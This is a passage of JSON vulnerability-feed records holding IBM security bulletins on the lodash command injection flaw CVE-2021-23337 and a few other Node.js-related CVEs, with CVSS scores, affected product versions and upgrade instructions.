false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-23337"], "modified": "2021-06-22T15:56:46", "id": "FF5A8A25C6F29CF39641217FCD026C317D3243C49B57A257E96A9297D83DE158", "href": "https://www.ibm.com/support/pages/node/6465927", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-02-28T01:57:16", "description": "## Summary\n\nA security vulnerability in Node.js Lodash module affects IBM Cloud Automation Manager.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-23337](<https://vulners.com/cve/CVE-2021-23337>) \n** DESCRIPTION: **Node.js lodash module could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by a command injection flaw in the template. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196797](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196797>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Automation Manager| 4.2.0.1 \n \n## Remediation/Fixes\n\nDownload IBM Cloud Automation Manager 4.2.0.1 iFix 3 from \n[https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&amp;release=All&amp;platform=All&amp;function=fixId&amp;fixids=icp-cam-3.2.1-build600412&amp;includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-cam-3.2.1-build600412&includeSupersedes=0>)\n\nFollow the instructions in Readme link in [https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&amp;release=All&amp;platform=All&amp;function=fixId&amp;fixids=icp-cam-3.2.1-build600412&amp;includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-cam-3.2.1-build600412&includeSupersedes=0>) to install the iFix 3 to your IBM Cloud Automation Manager 4.2.0.1.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-12T13:59:12", "type": "ibm", "title": "Security Bulletin: A security vulnerability in Node.js Lodash module affects IBM Cloud Automation Manager.", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-23337"], "modified": "2021-05-12T13:59:12", "id": "94A01D2CF2192721BEC6AADD5AA1F6F77E4160E60A91D15CDDF7AF41661CFFDA", "href": "https://www.ibm.com/support/pages/node/6451791", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-02-28T01:54:28", "description": "## Summary\n\nIBM Cloud Private is vulnerable to Node.js lodash vulnerabilities\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-23337](<https://vulners.com/cve/CVE-2021-23337>) \n** DESCRIPTION: **Node.js lodash module could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by a command injection flaw in the template. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196797](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196797>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Private| 3.2.1 CD \nIBM Cloud Private| 3.2.2 CD \n \n\n\n## Remediation/Fixes\n\nProduct defect fixes and security updates are only available for the two most recent Continuous Delivery (CD) update packages \n\n * IBM Cloud Private 3.2.1\n * IBM Cloud Private 3.2.2\n\nFor IBM Cloud Private 3.2.1, apply fix pack:\n\n * [IBM Cloud Private 3.2.1.2105](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.2.1.2105-build600576-44535&includeSupersedes=0> \"IBM Cloud Private 3.2.1.2105\" )\n\nFor IBM Cloud Private 3.2.2, apply fix pack:\n\n * [IBM Cloud Private 3.2.2.2105](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm/WebSphere/IBM+Cloud+Private&release=All&platform=All&function=fixId&fixids=icp-3.2.2.2105-build600575-44536&includeSupersedes=0> \"IBM Cloud Private 3.2.2.2105\" )\n \n\n\nFor IBM Cloud Private 3.1.0, 3.1.1, 3.1.2, 3.2.0:\n\n * Upgrade to the latest Continuous Delivery (CD) update package, IBM Cloud Private 3.2.2. \n * If required, individual product fixes can be made available between CD update packages for resolution of problems. Contact IBM support for assistance\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-03T13:06:14", "type": "ibm", "title": "Security Bulletin: IBM Cloud Private is vulnerable to Node.js lodash vulnerabilities (CVE-2021-23337)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-23337"], "modified": "2021-09-03T13:06:14", "id": "2CE77B4160EBFD2BED97809CE15EBFFD32F5E48045C65040BF0F1EDBB3388D3C", "href": "https://www.ibm.com/support/pages/node/6486333", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-02-28T01:55:06", "description": "## Summary\n\nA potential vulnerability has been identified related to Node.js lodash module. Refer to details for additional information.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-23337](<https://vulners.com/cve/CVE-2021-23337>) \n** DESCRIPTION: **Node.js lodash module could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by a command injection flaw in the template. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196797](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196797>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nWA for ICP| 1.4.2, 1.5.0 \n \n\n\n## Remediation/Fixes\n\nUpgrade to the latest (4.0.0) release of WA for CP4D which maintains backward compatibility with the versions listed above.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-30T21:11:07", "type": "ibm", "title": "Security Bulletin: Potential vulnerability with Node.js lodash module", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-23337"], "modified": "2021-07-30T21:11:07", "id": "51036564FFC2834C5C0AEA3B9E457B929AAC861C25125D8BC0F6986E3A684E88", "href": "https://www.ibm.com/support/pages/node/6476630", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-02-28T01:44:27", "description": "## Summary\n\nLodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-23337](<https://vulners.com/cve/CVE-2021-23337>) \n** DESCRIPTION: **Node.js lodash module could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by a command injection flaw in the template. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196797](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196797>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nUCV - UrbanCode Velocity| All \n \n\n\n## Remediation/Fixes\n\nupgrade to 2.4.0 or later\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-08T19:02:36", "type": "ibm", "title": "Security Bulletin: CVE-2021-23337", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-23337"], "modified": "2022-07-08T19:02:36", "id": "330AEC48CC3C4D6D0571BCFF4F46F80B8B8300E288E40954485D292947FD965D", "href": "https://www.ibm.com/support/pages/node/6602303", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-02-28T01:56:15", "description": "## Summary\n\nIBM Cloud Pak for Integration is vulnerable to lodash vulnerability CVE-2021-23337 with details below.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-23337](<https://vulners.com/cve/CVE-2021-23337>) \n** DESCRIPTION: **Node.js lodash module could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by a command injection flaw in the template. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196797](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196797>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nPlatform Navigator in IBM Cloud Pak for Integration (CP4I)| 2020.4.1-0-eus \n2020.4.1-1-eus \n \n \n\n\n## Remediation/Fixes\n\n**Platform Navigator in ****IBM Cloud Pak for Integration**\n\nUpgrade Platform Navigator to 2020.4.1-2-eus using the Operator upgrade process described in the IBM Documentation \n<https://www.ibm.com/docs/en/cloud-paks/cp-integration/2020.4?topic=202041-upgrading-platform-navigator-component-deployment-interface>\n\n \n\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-18T14:39:27", "type": "ibm", "title": "Security Bulletin: IBM Cloud Pak for Integration is vulnerable to Node.js lodash vulnerability (CVE-2021-23337)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-23337"], "modified": "2021-06-18T14:39:27", "id": "6EE64696FDA9665AA0F54B4FB93057230ED3464327A74367561AE8FE0E2653CA", "href": "https://www.ibm.com/support/pages/node/6465183", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-02-28T01:56:26", "description": "## Summary\n\nIBM Integration Bus &amp; IBM App Connect Enterprise V11 ship with Node.js for which vulnerabilities were reported and have been addressed. Vulnerability details are listed below.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-23337](<https://vulners.com/cve/CVE-2021-23337>) \n** DESCRIPTION: **Node.js lodash module could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by a command injection flaw in the template. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196797](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196797>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Integration Bus V10.0.0 - V10.0.0.23\n\nIBM App connect Enterprise V11 , V11.0.0.0 - V11.0.0.11\n\n \n\n\n## Remediation/Fixes\n\n**Product**\n\n| \n\n**VRMF**\n\n| APAR| \n\n**Remediation / Fix** \n \n---|---|---|--- \nIBM App Connect Enterprise| V11.0.0.0-V11.0.0.11| IT36322| \n\nThe APAR is available in fix pack 11.0.0.12\n\n[IBM App Connect Enterprise Version V11-Fix Pack 11.0.0.12](<https://www.ibm.com/support/pages/node/6428027> \"IBM App Connect Enterprise Version V11-Fix Pack 11.0.0.12\" ) \n \nIBM Integration Bus | V10.0.0.0 - V10.0.0.23| IT36322| \n\nInterim fix for APAR IT36322 is available from\n\n[IBM Fix Central](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/Integration+Bus&release=10.0.0.23&platform=All&function=aparId&apars=IT36322> \"IBM Fix Central\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-11T05:56:37", "type": "ibm", "title": "Security Bulletin: IBM Integration Bus & IBM App Connect Enterprise V11 are affected by vulnerabilities in Node.js (CVE-2021-23337)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-23337"], "modified": "2021-06-11T05:56:37", "id": "68CBF727C8EF5456458B2504A21BC4A8C5D69369E847DE24B58B0481A4C43133", "href": "https://www.ibm.com/support/pages/node/6462883", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-02-28T01:57:30", "description": "## Summary\n\nApp Connect Enterprise may be vulnerable to a command injection vulnerability due to Node.js module lodash\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-23337](<https://vulners.com/cve/CVE-2021-23337>) \n** DESCRIPTION: **Node.js lodash module could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by a command injection flaw in the template. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/196797](<https://exchange.xforce.ibmcloud.com/vulnerabilities/196797>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nApp Connect Enterprise Certified Container| 1.0 with Operator \nApp Connect Enterprise Certified Container| 1.1 with Operator \nApp Connect Enterprise Certified Container| 1.2 with Operator \nApp Connect Enterprise Certified Container| 1.3 with Operator \n \n\n\n## Remediation/Fixes\n\n**App Connect Enterprise Certified Container 1.0, 1.2 and 1.3 CD**\n\nUpgrade to App Connect Enterprise Certified Container to Operator version 1.4.0 (available in CASE 1.4.0) or higher, and ensure that all components are at 11.0.0.12-r1 or higher.\n\n**App Connect Enterprise Certified Container 1.1 LTS**\n\nUpgrade to App Connect Enterprise Certified Container Operator version 1.1.1 EUS (available in CASE 1.1.1) or higher, and ensure that all components are at 11.0.0.12-r1-eus or higher.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-30T13:20:58", "type": "ibm", "title": "Security Bulletin: IBM App Connect Enterprise Certified Container may be vulnerable to a command injection vulnerability (CVE-2021-23337)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-23337"], "modified": "2021-04-30T13:20:58", "id": "83BEAE016A4ABD4FF346942DB25C3402A9F41C06DCE8690EF6135DC71C501718", "href": "https://www.ibm.com/support/pages/node/6448836", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-02-28T01:52:59", "description": "## Summary\n\nIBM Security Risk Manager on CP4S has addressed the following vulnerabilities:\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-29912](<https://vulners.com/cve/CVE-2021-29912>) \n** DESCRIPTION: **IBM Cloud Pak - Risk Manager is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/207828](<https://exchange.xforce.ibmcloud.com/vulnerabilities/207828>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2020-15168](<https://vulners.com/cve/CVE-2020-15168>) \n** DESCRIPTION: **Node.js node-fetch module is vulnerable to a denial of service, caused by the failure to honor the size option after following a redirect. By using a specially-crafted file, a remote attacker could exploit this vulnerability to consume excessive resource on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/188155](<https://exchange.xforce.ibmcloud.com/vulnerabilities/188155>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** Third Party Entry: **183561 \n** DESCRIPTION: **Node.js http-proxy module is vulnerable to a denial of service. By sending a specially crafted HTTP request with an overly long body, a remote attacker could exploit this vulnerability to trigger an ERR_HTTP_HEADERS_SENT unhandled exception and crash the server. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [https://exchange.xforce.ibmcloud.com/vulnerabilities/183561 ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/183561>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Security Risk Manager on CP4S| CP4S 1.7.0.0 \n \n\n\n## Remediation/Fixes\n\nTo obtain fixes for all reported issues, customers are advised to upgrade to CP4S 1.6.0.X, 1.7.0.0 or 1.7.1.0, and then apply the upgrade for CP4S 1.7.2.0.\n\n_Product_| _VRMF_| _APAR \n_| _Remediation / First Fix_ \n---|---|---|--- \nIBM Security Risk Manager on CP4S| 1.7.0.0| \n\n-\n\n| \n\nFollow the instructions to upgrade IBM Security Risk Manager on CP4S to 1.7.2.0 using [link](<https://www.ibm.com/docs/en/cloud-paks/cp-security/1.7?topic=172-upgrading-cloud-pak-security> \"link\" ). \n \nIBM Security Risk Manager on CP4S| 1.7.1.0 \n| \n\n- \n\n\n| \n\nFollow the instructions to upgrade IBM Security Risk Manager on CP4S to 1.7.2.0 using [link](<https://www.ibm.com/docs/en/cloud-paks/cp-security/1.7?topic=172-upgrading-cloud-pak-security> \"link\" ). \n \n \n\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-10-18T14:30:01", "type": "ibm", "title": "Security Bulletin: IBM Security Risk Manager on CP4S is affected by multiple vulnerabilities (CVE-2020-15168, CVE-2021-29912)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15168", "CVE-2021-29912"], "modified": "2021-10-18T14:30:01", "id": "F1815E83BF0EF6927077C76716B0A692E6C2404995F1A39B4C3B4D79335F5467", "href": "https://www.ibm.com/support/pages/node/6505283", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-28T01:51:18", "description": "## Summary\n\nCloud Pak for Security (CP4S) v1.7.2.0 and earlier uses a packages that are vulnerable to denial of service attack, and allow an authenticated user to obtain additional informationin HTTP responses, which could potentially be used in an attack against the system. These issues have been addressed in an update. See the Fixes section below for instructions. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-39013](<https://vulners.com/cve/CVE-2021-39013>) \n** DESCRIPTION: **IBM Cloud Pak for Security (CP4S) could allow an authenticated user to obtain sensitive information in HTTP responses that could be used in further attacks against the system. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/213651](<https://exchange.xforce.ibmcloud.com/vulnerabilities/213651>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2020-15168](<https://vulners.com/cve/CVE-2020-15168>) \n** DESCRIPTION: **Node.js node-fetch module is vulnerable to a denial of service, caused by the failure to honor the size option after following a redirect. By using a specially-crafted file, a remote attacker could exploit this vulnerability to consume excessive resource on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/188155](<https://exchange.xforce.ibmcloud.com/vulnerabilities/188155>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nCloud Pak for Security (CP4S)| 1.7.2.0 \nCloud Pak for Security (CP4S)| 1.7.1.0 \nCloud Pak for Security (CP4S)| 1.7.0.0 \n \n\n\n## Remediation/Fixes\n\nPlease upgrade to CP4S 1.8.0.0 following instructions at <https://www.ibm.com/docs/en/SSTDPP_1.8/docs/security-pak/upgrading.html>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-21T14:28:43", "type": "ibm", "title": "Security Bulletin: Cloud Pak for Security uses packages that are vulnerable to CVEs", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15168", "CVE-2021-39013"], "modified": "2021-12-21T14:28:43", "id": 